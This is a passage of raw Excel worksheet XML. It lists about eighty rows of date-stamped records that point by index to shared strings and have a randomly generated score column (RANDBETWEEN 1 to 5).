      <c r="A27990" s="1">
        <v>42864.614675925928</v>
      </c>
      <c r="C27990" t="s">
        <v>10</v>
      </c>
      <c r="D27990" t="s">
        <v>251</v>
      </c>
      <c r="E27990" t="s">
        <v>25482</v>
      </c>
      <c r="F27990">
        <f t="shared" ca="1" si="437"/>
        <v>5</v>
      </c>
    </row>
    <row r="27991" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27991" s="1">
        <v>42864.570034722223</v>
      </c>
      <c r="C27991" t="s">
        <v>10</v>
      </c>
      <c r="D27991" t="s">
        <v>374</v>
      </c>
      <c r="E27991" t="s">
        <v>25483</v>
      </c>
      <c r="F27991">
        <f t="shared" ca="1" si="437"/>
        <v>2</v>
      </c>
    </row>
    <row r="27992" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27992" s="1">
        <v>42864.548611111109</v>
      </c>
      <c r="C27992" t="s">
        <v>10</v>
      </c>
      <c r="D27992" t="s">
        <v>89</v>
      </c>
      <c r="E27992" t="s">
        <v>25484</v>
      </c>
      <c r="F27992">
        <f t="shared" ca="1" si="437"/>
        <v>3</v>
      </c>
    </row>
    <row r="27993" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27993" s="1">
        <v>42864.542685185188</v>
      </c>
      <c r="C27993" t="s">
        <v>10</v>
      </c>
      <c r="D27993" t="s">
        <v>11</v>
      </c>
      <c r="E27993" t="s">
        <v>25485</v>
      </c>
      <c r="F27993">
        <f t="shared" ca="1" si="437"/>
        <v>2</v>
      </c>
    </row>
    <row r="27994" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27994" s="1">
        <v>42864.541585648149</v>
      </c>
      <c r="C27994" t="s">
        <v>2104</v>
      </c>
      <c r="E27994" t="s">
        <v>25486</v>
      </c>
      <c r="F27994">
        <f t="shared" ca="1" si="437"/>
        <v>2</v>
      </c>
    </row>
    <row r="27995" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A27995" s="1">
        <v>42864.526458333334</v>
      </c>
      <c r="C27995" t="s">
        <v>10</v>
      </c>
      <c r="D27995" t="s">
        <v>6</v>
      </c>
      <c r="E27995" s="2" t="s">
        <v>25487</v>
      </c>
      <c r="F27995">
        <f t="shared" ca="1" si="437"/>
        <v>4</v>
      </c>
    </row>
    <row r="27996" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27996" s="1">
        <v>42864.511319444442</v>
      </c>
      <c r="C27996" t="s">
        <v>10</v>
      </c>
      <c r="D27996" t="s">
        <v>46</v>
      </c>
      <c r="E27996" t="s">
        <v>25488</v>
      </c>
      <c r="F27996">
        <f t="shared" ca="1" si="437"/>
        <v>2</v>
      </c>
    </row>
    <row r="27997" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A27997" s="1">
        <v>42864.496724537035</v>
      </c>
      <c r="C27997" t="s">
        <v>63</v>
      </c>
      <c r="D27997" t="s">
        <v>312</v>
      </c>
      <c r="E27997" s="2" t="s">
        <v>25489</v>
      </c>
      <c r="F27997">
        <f t="shared" ca="1" si="437"/>
        <v>3</v>
      </c>
    </row>
    <row r="27998" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27998" s="1">
        <v>42864.486076388886</v>
      </c>
      <c r="C27998" t="s">
        <v>16</v>
      </c>
      <c r="E27998" s="2" t="s">
        <v>25490</v>
      </c>
      <c r="F27998">
        <f t="shared" ca="1" si="437"/>
        <v>3</v>
      </c>
    </row>
    <row r="27999" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27999" s="1">
        <v>42864.474606481483</v>
      </c>
      <c r="C27999" t="s">
        <v>6</v>
      </c>
      <c r="D27999" t="s">
        <v>124</v>
      </c>
      <c r="E27999" s="2" t="s">
        <v>25491</v>
      </c>
      <c r="F27999">
        <f t="shared" ca="1" si="437"/>
        <v>2</v>
      </c>
    </row>
    <row r="28000" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A28000" s="1">
        <v>42864.47284722222</v>
      </c>
      <c r="C28000" t="s">
        <v>107</v>
      </c>
      <c r="E28000" s="2" t="s">
        <v>25492</v>
      </c>
      <c r="F28000">
        <f t="shared" ca="1" si="437"/>
        <v>3</v>
      </c>
    </row>
    <row r="28001" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28001" s="1">
        <v>42864.455891203703</v>
      </c>
      <c r="C28001" t="s">
        <v>10</v>
      </c>
      <c r="D28001" t="s">
        <v>52</v>
      </c>
      <c r="E28001" t="s">
        <v>25493</v>
      </c>
      <c r="F28001">
        <f t="shared" ca="1" si="437"/>
        <v>2</v>
      </c>
    </row>
    <row r="28002" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28002" s="1">
        <v>42864.453726851854</v>
      </c>
      <c r="C28002" t="s">
        <v>48</v>
      </c>
      <c r="E28002" s="2" t="s">
        <v>25494</v>
      </c>
      <c r="F28002">
        <f t="shared" ca="1" si="437"/>
        <v>2</v>
      </c>
    </row>
    <row r="28003" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A28003" s="1">
        <v>42864.452569444446</v>
      </c>
      <c r="C28003" t="s">
        <v>65</v>
      </c>
      <c r="E28003" s="2" t="s">
        <v>25495</v>
      </c>
      <c r="F28003">
        <f t="shared" ca="1" si="437"/>
        <v>5</v>
      </c>
    </row>
    <row r="28004" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28004" s="1">
        <v>42864.430150462962</v>
      </c>
      <c r="C28004" t="s">
        <v>10</v>
      </c>
      <c r="D28004" t="s">
        <v>89</v>
      </c>
      <c r="E28004" t="s">
        <v>25496</v>
      </c>
      <c r="F28004">
        <f t="shared" ca="1" si="437"/>
        <v>5</v>
      </c>
    </row>
    <row r="28005" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A28005" s="1">
        <v>42864.424409722225</v>
      </c>
      <c r="C28005" t="s">
        <v>10</v>
      </c>
      <c r="D28005" t="s">
        <v>56</v>
      </c>
      <c r="E28005" s="2" t="s">
        <v>25497</v>
      </c>
      <c r="F28005">
        <f t="shared" ca="1" si="437"/>
        <v>3</v>
      </c>
    </row>
    <row r="28006" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A28006" s="1">
        <v>42864.408888888887</v>
      </c>
      <c r="C28006" t="s">
        <v>10</v>
      </c>
      <c r="D28006" t="s">
        <v>89</v>
      </c>
      <c r="E28006" s="2" t="s">
        <v>25498</v>
      </c>
      <c r="F28006">
        <f t="shared" ca="1" si="437"/>
        <v>1</v>
      </c>
    </row>
    <row r="28007" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28007" s="1">
        <v>42864.400057870371</v>
      </c>
      <c r="C28007" t="s">
        <v>10</v>
      </c>
      <c r="D28007" t="s">
        <v>80</v>
      </c>
      <c r="E28007" t="s">
        <v>25499</v>
      </c>
      <c r="F28007">
        <f t="shared" ca="1" si="437"/>
        <v>1</v>
      </c>
    </row>
    <row r="28008" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28008" s="1">
        <v>42864.372939814813</v>
      </c>
      <c r="C28008" t="s">
        <v>71</v>
      </c>
      <c r="E28008" t="s">
        <v>25500</v>
      </c>
      <c r="F28008">
        <f t="shared" ca="1" si="437"/>
        <v>4</v>
      </c>
    </row>
    <row r="28009" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28009" s="1">
        <v>42864.365879629629</v>
      </c>
      <c r="C28009" t="s">
        <v>6</v>
      </c>
      <c r="D28009" t="s">
        <v>25</v>
      </c>
      <c r="E28009" t="s">
        <v>25501</v>
      </c>
      <c r="F28009">
        <f t="shared" ca="1" si="437"/>
        <v>3</v>
      </c>
    </row>
    <row r="28010" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A28010" s="1">
        <v>42864.346805555557</v>
      </c>
      <c r="C28010" t="s">
        <v>173</v>
      </c>
      <c r="E28010" s="2" t="s">
        <v>25502</v>
      </c>
      <c r="F28010">
        <f t="shared" ca="1" si="437"/>
        <v>2</v>
      </c>
    </row>
    <row r="28011" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A28011" s="1">
        <v>42864.344606481478</v>
      </c>
      <c r="C28011" t="s">
        <v>16</v>
      </c>
      <c r="D28011" t="s">
        <v>312</v>
      </c>
      <c r="E28011" s="2" t="s">
        <v>25503</v>
      </c>
      <c r="F28011">
        <f t="shared" ca="1" si="437"/>
        <v>2</v>
      </c>
    </row>
    <row r="28012" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28012" s="1">
        <v>42864.34443287037</v>
      </c>
      <c r="C28012" t="s">
        <v>41</v>
      </c>
      <c r="E28012" s="2" t="s">
        <v>25504</v>
      </c>
      <c r="F28012">
        <f t="shared" ca="1" si="437"/>
        <v>5</v>
      </c>
    </row>
    <row r="28013" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28013" s="1">
        <v>42864.343321759261</v>
      </c>
      <c r="C28013" t="s">
        <v>50</v>
      </c>
      <c r="F28013">
        <f t="shared" ca="1" si="437"/>
        <v>5</v>
      </c>
    </row>
    <row r="28014" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28014" s="1">
        <v>42864.315740740742</v>
      </c>
      <c r="C28014" t="s">
        <v>134</v>
      </c>
      <c r="E28014" t="s">
        <v>25505</v>
      </c>
      <c r="F28014">
        <f t="shared" ca="1" si="437"/>
        <v>5</v>
      </c>
    </row>
    <row r="28015" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28015" s="1">
        <v>42864.310532407406</v>
      </c>
      <c r="C28015" t="s">
        <v>253</v>
      </c>
      <c r="E28015" t="s">
        <v>25506</v>
      </c>
      <c r="F28015">
        <f t="shared" ca="1" si="437"/>
        <v>1</v>
      </c>
    </row>
    <row r="28016" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28016" s="1">
        <v>42864.300196759257</v>
      </c>
      <c r="C28016" t="s">
        <v>461</v>
      </c>
      <c r="E28016" t="s">
        <v>25507</v>
      </c>
      <c r="F28016">
        <f t="shared" ca="1" si="437"/>
        <v>3</v>
      </c>
    </row>
    <row r="28017" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28017" s="1">
        <v>42864.300185185188</v>
      </c>
      <c r="C28017" t="s">
        <v>461</v>
      </c>
      <c r="E28017" t="s">
        <v>25507</v>
      </c>
      <c r="F28017">
        <f t="shared" ca="1" si="437"/>
        <v>5</v>
      </c>
    </row>
    <row r="28018" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28018" s="1">
        <v>42864.281053240738</v>
      </c>
      <c r="C28018" t="s">
        <v>48</v>
      </c>
      <c r="E28018" t="s">
        <v>25508</v>
      </c>
      <c r="F28018">
        <f t="shared" ca="1" si="437"/>
        <v>2</v>
      </c>
    </row>
    <row r="28019" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28019" s="1">
        <v>42864.25340277778</v>
      </c>
      <c r="C28019" t="s">
        <v>41</v>
      </c>
      <c r="E28019" s="2" t="s">
        <v>25509</v>
      </c>
      <c r="F28019">
        <f t="shared" ca="1" si="437"/>
        <v>5</v>
      </c>
    </row>
    <row r="28020" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A28020" s="1">
        <v>42864.201631944445</v>
      </c>
      <c r="C28020" t="s">
        <v>71</v>
      </c>
      <c r="E28020" s="2" t="s">
        <v>25510</v>
      </c>
      <c r="F28020">
        <f t="shared" ca="1" si="437"/>
        <v>4</v>
      </c>
    </row>
    <row r="28021" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28021" s="1">
        <v>42864.185335648152</v>
      </c>
      <c r="C28021" t="s">
        <v>319</v>
      </c>
      <c r="E28021" t="s">
        <v>25511</v>
      </c>
      <c r="F28021">
        <f t="shared" ca="1" si="437"/>
        <v>1</v>
      </c>
    </row>
    <row r="28022" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28022" s="1">
        <v>42864.16265046296</v>
      </c>
      <c r="C28022" t="s">
        <v>41</v>
      </c>
      <c r="E28022" t="s">
        <v>25512</v>
      </c>
      <c r="F28022">
        <f t="shared" ca="1" si="437"/>
        <v>5</v>
      </c>
    </row>
    <row r="28023" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A28023" s="1">
        <v>42864.154421296298</v>
      </c>
      <c r="C28023" t="s">
        <v>71</v>
      </c>
      <c r="E28023" s="2" t="s">
        <v>25513</v>
      </c>
      <c r="F28023">
        <f t="shared" ca="1" si="437"/>
        <v>4</v>
      </c>
    </row>
    <row r="28024" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A28024" s="1">
        <v>42864.112546296295</v>
      </c>
      <c r="C28024" t="s">
        <v>1381</v>
      </c>
      <c r="E28024" s="2" t="s">
        <v>25514</v>
      </c>
      <c r="F28024">
        <f t="shared" ca="1" si="437"/>
        <v>4</v>
      </c>
    </row>
    <row r="28025" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A28025" s="1">
        <v>42864.100694444445</v>
      </c>
      <c r="C28025" t="s">
        <v>140</v>
      </c>
      <c r="D28025" t="s">
        <v>46</v>
      </c>
      <c r="E28025" s="2" t="s">
        <v>25515</v>
      </c>
      <c r="F28025">
        <f t="shared" ca="1" si="437"/>
        <v>2</v>
      </c>
    </row>
    <row r="28026" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28026" s="1">
        <v>42864.076504629629</v>
      </c>
      <c r="C28026" t="s">
        <v>60</v>
      </c>
      <c r="E28026" t="s">
        <v>25516</v>
      </c>
      <c r="F28026">
        <f t="shared" ca="1" si="437"/>
        <v>4</v>
      </c>
    </row>
    <row r="28027" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28027" s="1">
        <v>42864.057546296295</v>
      </c>
      <c r="C28027" t="s">
        <v>314</v>
      </c>
      <c r="E28027" s="2" t="s">
        <v>25517</v>
      </c>
      <c r="F28027">
        <f t="shared" ca="1" si="437"/>
        <v>3</v>
      </c>
    </row>
    <row r="28028" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A28028" s="1">
        <v>42863.983935185184</v>
      </c>
      <c r="C28028" t="s">
        <v>314</v>
      </c>
      <c r="E28028" s="2" t="s">
        <v>25518</v>
      </c>
      <c r="F28028">
        <f t="shared" ca="1" si="437"/>
        <v>3</v>
      </c>
    </row>
    <row r="28029" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28029" s="1">
        <v>42863.927789351852</v>
      </c>
      <c r="C28029" t="s">
        <v>410</v>
      </c>
      <c r="F28029">
        <f t="shared" ca="1" si="437"/>
        <v>2</v>
      </c>
    </row>
    <row r="28030" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28030" s="1">
        <v>42863.903078703705</v>
      </c>
      <c r="C28030" t="s">
        <v>260</v>
      </c>
      <c r="F28030">
        <f t="shared" ca="1" si="437"/>
        <v>1</v>
      </c>
    </row>
    <row r="28031" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28031" s="1">
        <v>42863.891527777778</v>
      </c>
      <c r="C28031" t="s">
        <v>314</v>
      </c>
      <c r="E28031" t="s">
        <v>25519</v>
      </c>
      <c r="F28031">
        <f t="shared" ca="1" si="437"/>
        <v>2</v>
      </c>
    </row>
    <row r="28032" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28032" s="1">
        <v>42863.858194444445</v>
      </c>
      <c r="C28032" t="s">
        <v>410</v>
      </c>
      <c r="E28032" t="s">
        <v>25520</v>
      </c>
      <c r="F28032">
        <f t="shared" ca="1" si="437"/>
        <v>2</v>
      </c>
    </row>
    <row r="28033" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28033" s="1">
        <v>42863.794699074075</v>
      </c>
      <c r="C28033" t="s">
        <v>10</v>
      </c>
      <c r="D28033" t="s">
        <v>41</v>
      </c>
      <c r="E28033" t="s">
        <v>25521</v>
      </c>
      <c r="F28033">
        <f t="shared" ca="1" si="437"/>
        <v>4</v>
      </c>
    </row>
    <row r="28034" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28034" s="1">
        <v>42863.792037037034</v>
      </c>
      <c r="C28034" t="s">
        <v>10</v>
      </c>
      <c r="D28034" t="s">
        <v>52</v>
      </c>
      <c r="E28034" t="s">
        <v>25522</v>
      </c>
      <c r="F28034">
        <f t="shared" ref="F28034:F28097" ca="1" si="438">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="28035" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28035" s="1">
        <v>42863.737488425926</v>
      </c>
      <c r="C28035" t="s">
        <v>10</v>
      </c>
      <c r="D28035" t="s">
        <v>52</v>
      </c>
      <c r="E28035" t="s">
        <v>25523</v>
      </c>
      <c r="F28035">
        <f t="shared" ca="1" si="438"/>
        <v>1</v>
      </c>
    </row>
    <row r="28036" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28036" s="1">
        <v>42863.705613425926</v>
      </c>
      <c r="C28036" t="s">
        <v>10</v>
      </c>
      <c r="D28036" t="s">
        <v>11</v>
      </c>
      <c r="E28036" s="2" t="s">
        <v>25524</v>
      </c>
      <c r="F28036">
        <f t="shared" ca="1" si="438"/>
        <v>4</v>
      </c>
    </row>
    <row r="28037" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A28037" s="1">
        <v>42863.686956018515</v>
      </c>
      <c r="C28037" t="s">
        <v>10</v>
      </c>
      <c r="D28037" t="s">
        <v>36</v>
      </c>
      <c r="E28037" s="2" t="s">
        <v>25525</v>
      </c>
      <c r="F28037">
        <f t="shared" ca="1" si="438"/>
        <v>4</v>
      </c>
    </row>
    <row r="28038" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A28038" s="1">
        <v>42863.641284722224</v>
      </c>
      <c r="C28038" t="s">
        <v>1341</v>
      </c>
      <c r="E28038" s="2" t="s">
        <v>25526</v>
      </c>
      <c r="F28038">
        <f t="shared" ca="1" si="438"/>
        <v>2</v>
      </c>
    </row>
    <row r="28039" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28039" s="1">
        <v>42863.638368055559</v>
      </c>
      <c r="C28039" t="s">
        <v>10</v>
      </c>
      <c r="D28039" t="s">
        <v>52</v>
      </c>
      <c r="E28039" t="s">
        <v>25527</v>
      </c>
      <c r="F28039">
        <f t="shared" ca="1" si="438"/>
        <v>2</v>
      </c>
    </row>
    <row r="28040" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28040" s="1">
        <v>42863.612569444442</v>
      </c>
      <c r="C28040" t="s">
        <v>10</v>
      </c>
      <c r="D28040" t="s">
        <v>222</v>
      </c>
      <c r="E28040" t="s">
        <v>25528</v>
      </c>
      <c r="F28040">
        <f t="shared" ca="1" si="438"/>
        <v>5</v>
      </c>
    </row>
    <row r="28041" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28041" s="1">
        <v>42863.609444444446</v>
      </c>
      <c r="C28041" t="s">
        <v>10</v>
      </c>
      <c r="D28041" t="s">
        <v>112</v>
      </c>
      <c r="E28041" t="s">
        <v>25529</v>
      </c>
      <c r="F28041">
        <f t="shared" ca="1" si="438"/>
        <v>3</v>
      </c>
    </row>
    <row r="28042" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28042" s="1">
        <v>42863.581157407411</v>
      </c>
      <c r="C28042" t="s">
        <v>10</v>
      </c>
      <c r="D28042" t="s">
        <v>290</v>
      </c>
      <c r="E28042" t="s">
        <v>25530</v>
      </c>
      <c r="F28042">
        <f t="shared" ca="1" si="438"/>
        <v>3</v>
      </c>
    </row>
    <row r="28043" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A28043" s="1">
        <v>42863.558599537035</v>
      </c>
      <c r="C28043" t="s">
        <v>10</v>
      </c>
      <c r="D28043" t="s">
        <v>89</v>
      </c>
      <c r="E28043" s="2" t="s">
        <v>25531</v>
      </c>
      <c r="F28043">
        <f t="shared" ca="1" si="438"/>
        <v>3</v>
      </c>
    </row>
    <row r="28044" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A28044" s="1">
        <v>42863.545914351853</v>
      </c>
      <c r="C28044" t="s">
        <v>10</v>
      </c>
      <c r="D28044" t="s">
        <v>89</v>
      </c>
      <c r="E28044" s="2" t="s">
        <v>25532</v>
      </c>
      <c r="F28044">
        <f t="shared" ca="1" si="438"/>
        <v>1</v>
      </c>
    </row>
    <row r="28045" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A28045" s="1">
        <v>42863.540995370371</v>
      </c>
      <c r="C28045" t="s">
        <v>10</v>
      </c>
      <c r="D28045" t="s">
        <v>89</v>
      </c>
      <c r="E28045" s="2" t="s">
        <v>25532</v>
      </c>
      <c r="F28045">
        <f t="shared" ca="1" si="438"/>
        <v>5</v>
      </c>
    </row>
    <row r="28046" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28046" s="1">
        <v>42863.525671296295</v>
      </c>
      <c r="C28046" t="s">
        <v>10</v>
      </c>
      <c r="D28046" t="s">
        <v>36</v>
      </c>
      <c r="E28046" t="s">
        <v>25533</v>
      </c>
      <c r="F28046">
        <f t="shared" ca="1" si="438"/>
        <v>1</v>
      </c>
    </row>
    <row r="28047" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28047" s="1">
        <v>42863.515104166669</v>
      </c>
      <c r="C28047" t="s">
        <v>260</v>
      </c>
      <c r="E28047" s="2" t="s">
        <v>25534</v>
      </c>
      <c r="F28047">
        <f t="shared" ca="1" si="438"/>
        <v>3</v>
      </c>
    </row>
    <row r="28048" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28048" s="1">
        <v>42863.504363425927</v>
      </c>
      <c r="C28048" t="s">
        <v>6</v>
      </c>
      <c r="D28048" t="s">
        <v>194</v>
      </c>
      <c r="E28048" t="s">
        <v>25535</v>
      </c>
      <c r="F28048">
        <f t="shared" ca="1" si="438"/>
        <v>3</v>
      </c>
    </row>
    <row r="28049" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A28049" s="1">
        <v>42863.500856481478</v>
      </c>
      <c r="C28049" t="s">
        <v>16</v>
      </c>
      <c r="E28049" s="2" t="s">
        <v>25536</v>
      </c>
      <c r="F28049">
        <f t="shared" ca="1" si="438"/>
        <v>5</v>
      </c>
    </row>
    <row r="28050" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28050" s="1">
        <v>42863.483749999999</v>
      </c>
      <c r="C28050" t="s">
        <v>6</v>
      </c>
      <c r="D28050" t="s">
        <v>25</v>
      </c>
      <c r="E28050" t="s">
        <v>25537</v>
      </c>
      <c r="F28050">
        <f t="shared" ca="1" si="438"/>
        <v>2</v>
      </c>
    </row>
    <row r="28051" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A28051" s="1">
        <v>42863.47828703704</v>
      </c>
      <c r="C28051" t="s">
        <v>6</v>
      </c>
      <c r="D28051" t="s">
        <v>25</v>
      </c>
      <c r="E28051" s="2" t="s">
        <v>25538</v>
      </c>
      <c r="F28051">
        <f t="shared" ca="1" si="438"/>
        <v>4</v>
      </c>
    </row>
    <row r="28052" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28052" s="1">
        <v>42863.466747685183</v>
      </c>
      <c r="C28052" t="s">
        <v>10</v>
      </c>
      <c r="D28052" t="s">
        <v>17</v>
      </c>
      <c r="E28052" t="s">
        <v>25539</v>
      </c>
      <c r="F28052">
        <f t="shared" ca="1" si="438"/>
        <v>5</v>
      </c>
    </row>
    <row r="28053" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28053" s="1">
        <v>42863.466307870367</v>
      </c>
      <c r="C28053" t="s">
        <v>10</v>
      </c>
      <c r="D28053" t="s">
        <v>112</v>
      </c>
      <c r="E28053" t="s">
        <v>25540</v>
      </c>
      <c r="F28053">
        <f t="shared" ca="1" si="438"/>
        <v>4</v>
      </c>
    </row>
    <row r="28054" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A28054" s="1">
        <v>42863.466157407405</v>
      </c>
      <c r="C28054" t="s">
        <v>10</v>
      </c>
      <c r="D28054" t="s">
        <v>23</v>
      </c>
      <c r="E28054" s="2" t="s">
        <v>25541</v>
      </c>
      <c r="F28054">
        <f t="shared" ca="1" si="438"/>
        <v>5</v>
      </c>
    </row>
    <row r="28055" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A28055" s="1">
        <v>42863.450069444443</v>
      </c>
      <c r="C28055" t="s">
        <v>10</v>
      </c>
      <c r="D28055" t="s">
        <v>56</v>
      </c>
      <c r="E28055" s="2" t="s">
        <v>25542</v>
      </c>
      <c r="F28055">
        <f t="shared" ca="1" si="438"/>
        <v>2</v>
      </c>
    </row>
    <row r="28056" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A28056" s="1">
        <v>42863.439398148148</v>
      </c>
      <c r="C28056" t="s">
        <v>318</v>
      </c>
      <c r="E28056" s="2" t="s">
        <v>25543</v>
      </c>
      <c r="F28056">
        <f t="shared" ca="1" si="438"/>
        <v>4</v>
      </c>
    </row>
    <row r="28057" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A28057" s="1">
        <v>42863.423622685186</v>
      </c>
      <c r="C28057" t="s">
        <v>10</v>
      </c>
      <c r="D28057" t="s">
        <v>80</v>
      </c>
      <c r="E28057" s="2" t="s">
        <v>25544</v>
      </c>
      <c r="F28057">
        <f t="shared" ca="1" si="438"/>
        <v>2</v>
      </c>
    </row>
    <row r="28058" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28058" s="1">
        <v>42863.416087962964</v>
      </c>
      <c r="C28058" t="s">
        <v>48</v>
      </c>
      <c r="E28058" t="s">
        <v>25545</v>
      </c>
      <c r="F28058">
        <f t="shared" ca="1" si="438"/>
        <v>5</v>
      </c>
    </row>
    <row r="28059" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A28059" s="1">
        <v>42863.414629629631</v>
      </c>
      <c r="C28059" t="s">
        <v>48</v>
      </c>
      <c r="E28059" s="2" t="s">
        <v>25546</v>
      </c>
      <c r="F28059">
        <f t="shared" ca="1" si="438"/>
        <v>1</v>
      </c>
    </row>
    <row r="28060" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28060" s="1">
        <v>42863.397361111114</v>
      </c>
      <c r="C28060" t="s">
        <v>10</v>
      </c>
      <c r="D28060" t="s">
        <v>86</v>
      </c>
      <c r="E28060" t="s">
        <v>25547</v>
      </c>
      <c r="F28060">
        <f t="shared" ca="1" si="438"/>
        <v>3</v>
      </c>
    </row>
    <row r="28061" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28061" s="1">
        <v>42863.381493055553</v>
      </c>
      <c r="C28061" t="s">
        <v>10</v>
      </c>
      <c r="D28061" t="s">
        <v>163</v>
      </c>
      <c r="E28061" t="s">
        <v>25548</v>
      </c>
      <c r="F28061">
        <f t="shared" ca="1" si="438"/>
        <v>3</v>
      </c>
    </row>
    <row r="28062" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28062" s="1">
        <v>42863.373749999999</v>
      </c>
      <c r="C28062" t="s">
        <v>41</v>
      </c>
      <c r="E28062" t="s">
        <v>25549</v>
      </c>
      <c r="F28062">
        <f t="shared" ca="1" si="438"/>
        <v>3</v>
      </c>
    </row>
    <row r="28063" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28063" s="1">
        <v>42863.361562500002</v>
      </c>
      <c r="C28063" t="s">
        <v>328</v>
      </c>
      <c r="E28063" t="s">
        <v>25550</v>
      </c>
      <c r="F28063">
        <f t="shared" ca="1" si="438"/>
        <v>1</v>
      </c>
    </row>
    <row r="28064" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28064" s="1">
        <v>42863.28328703704</v>
      </c>
      <c r="C28064" t="s">
        <v>48</v>
      </c>
      <c r="E28064" t="s">
        <v>25551</v>
      </c>
      <c r="F28064">
        <f t="shared" ca="1" si="438"/>
        <v>2</v>
      </c>
    </row>
    <row r="28065" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28065" s="1">
        <v>42863.273923611108</v>
      </c>
      <c r="C28065" t="s">
        <v>140</v>
      </c>
      <c r="D28065" t="s">
        <v>141</v>
      </c>
      <c r="E28065" t="s">
        <v>25552</v>
      </c>
      <c r="F28065">
        <f t="shared" ca="1" si="438"/>
        <v>3</v>
      </c>
    </row>
    <row r="28066" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28066" s="1">
        <v>42863.19940972222</v>
      </c>
      <c r="C28066" t="s">
        <v>845</v>
      </c>
      <c r="E28066" t="s">
        <v>25553</v>
      </c>
      <c r="F28066">
        <f t="shared" ca="1" si="438"/>
        <v>3</v>
      </c>
    </row>
    <row r="28067" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A28067" s="1">
        <v>42863.090509259258</v>
      </c>
      <c r="C28067" t="s">
        <v>776</v>
      </c>
      <c r="E28067" s="2" t="s">
        <v>25554</v>
      </c>
      <c r="F28067">
        <f t="shared" ca="1" si="438"/>
        <v>1</v>
      </c>
    </row>
    <row r="28068" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28068" s="1">
        <v>42863.078298611108</v>
      </c>
      <c r="C28068" t="s">
        <v>73</v>
      </c>
      <c r="E28068" t="s">
        <v>25555</v>
      </c>
      <c r="F28068">
        <f t="shared" ca="1" si="438"/>
        <v>3</v>
      </c>
    </row>
    <row r="28069" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A28069" s="1">
        <v>42863.076111111113</v>
      </c>
      <c r="C28069" t="s">
        <v>41</v>
      </c>
      <c r="E28069" s="2" t="s">
        <v>25556</v>
      </c>
      <c r="F28069">
